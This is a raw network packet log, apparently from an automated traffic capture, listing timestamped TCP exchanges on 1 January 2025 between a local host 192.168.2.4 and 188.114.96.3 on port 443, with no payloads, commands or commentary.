                                                          Jan 1, 2025 17:10:07.472414970 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.472430944 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.472465992 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.472505093 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.472624063 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.472639084 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.472695112 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.472702026 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.473014116 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.473031044 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.473073959 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.473081112 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.473109961 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.473812103 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.473825932 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.473881006 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.473889112 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.480274916 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.480298996 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.480333090 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.480340004 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.480351925 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.480611086 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.480624914 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.480670929 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.480680943 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.480706930 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.480989933 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.481008053 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.481050014 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.481057882 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.481080055 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.531119108 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.562700033 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.562721968 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.562789917 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.562800884 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.562841892 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.563018084 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.563033104 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.563076973 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.563083887 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.563112020 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.563121080 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.563282967 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.563298941 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.563353062 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.563359976 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.563414097 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.563637018 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.563652039 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.563709974 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.563716888 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.563765049 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.564265966 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.564281940 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.564337015 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.564344883 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.565723896 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.570828915 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.570844889 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.570895910 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.570908070 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.570920944 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.570945978 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.571147919 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.571163893 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.571199894 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.571206093 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.571217060 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.571254969 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.571566105 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.571579933 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.571643114 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.571650028 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.571702957 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.653337955 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.653354883 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.653410912 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.653430939 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.653492928 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.653493881 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.653506041 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.653531075 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.653551102 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.653579950 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.653585911 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.653628111 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.653853893 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.653867006 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.653911114 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.653918982 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.654155016 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.654172897 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.654211044 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.654217958 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.654228926 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.654259920 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.654792070 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.654804945 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.654855013 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.654864073 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.655061007 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.661703110 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.661722898 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.661765099 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.661773920 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.661798000 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.661815882 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.662019968 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.662034988 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.662167072 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.662173986 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.662220001 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.662321091 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.662343025 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.662389040 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.662396908 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.665226936 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.743942022 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.743958950 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.744014025 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.744025946 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.744040966 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.744066000 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.744158983 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.744174957 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.744225979 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.744231939 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.744330883 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.744529963 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.744543076 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.744579077 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.744584084 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.744595051 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.744625092 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.744693995 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.744709015 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.744751930 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.744762897 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.744780064 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.744798899 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.745284081 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.745299101 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.745348930 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.745354891 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.745543957 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.752311945 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.752327919 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.752384901 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.752393961 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.752403975 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.752430916 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.752526999 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.752542019 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.752583027 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.752590895 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.752603054 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.752629042 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.752948999 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.752964020 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.753005981 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.753012896 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.753031015 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.753051043 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.834563017 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.834583044 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.834666014 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.834677935 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.834747076 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.834770918 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.834804058 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.834810972 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.834824085 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.834857941 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.835167885 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.835181952 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.835252047 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.835259914 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.835335970 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.836261034 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.836278915 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.836323977 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.836334944 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.836364031 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.836370945 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.839087963 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.839104891 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.839162111 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.839169979 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.839433908 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.842803955 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.842818975 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.842904091 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.842911959 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.842956066 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.843135118 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.843154907 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.843223095 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.843230009 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.843429089 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.843452930 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.843482018 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.843487978 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.843503952 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.845566034 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.926129103 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.926146030 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.926212072 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.926223040 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.926256895 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.926273108 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.926301956 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.926326036 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.926357985 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.926364899 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.926393986 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.926413059 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.927248955 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.927263975 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.927337885 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.927345991 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.927484035 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.927504063 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.927546978 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.927553892 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.927582979 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.927596092 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.929711103 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.929725885 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.929780006 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.929788113 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.933492899 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.933584929 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.933603048 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.933644056 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.933650970 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.933665991 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.933691978 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.933939934 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.933958054 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.934014082 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.934020996 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.934094906 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.934113979 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.934154034 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.934159994 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:07.934170961 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:07.934201956 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.020150900 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020169973 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020246029 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020252943 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.020276070 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020307064 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.020343065 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.020347118 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020358086 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020389080 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020395041 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.020440102 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.020446062 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020462036 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020481110 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020520926 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.020528078 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020540953 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.020900965 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020921946 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020977020 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.020983934 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.020997047 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.024043083 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.024070024 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.024122953 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.024136066 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.024168015 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.024415970 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.024430037 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.024483919 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.024492025 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.024744034 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.024761915 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.024801016 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.024807930 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.024820089 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.077929974 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.110455036 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.110476017 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.110542059 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.110553026 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.110594034 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.110702991 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.110718012 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.110765934 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.110773087 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.110817909 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.111056089 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.111072063 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.111114979 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.111120939 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.111145973 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.111159086 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.111469984 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.111485004 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.111531973 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.111536980 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.111562967 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.111586094 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.111695051 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.111711025 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.111769915 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.111776114 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.111906052 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.114665985 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.114685059 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.114732027 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.114738941 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.114773989 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.114787102 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.115087032 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.115104914 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.115161896 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.115168095 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.115197897 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.115216970 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.115243912 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.115257978 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.115329981 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.115335941 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.115364075 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.115381956 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.201720953 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.201738119 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.201848030 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.201865911 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.201890945 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.201910019 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:08.201944113 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:08.201951027 CET44349733188.114.96.3192.168.2.4
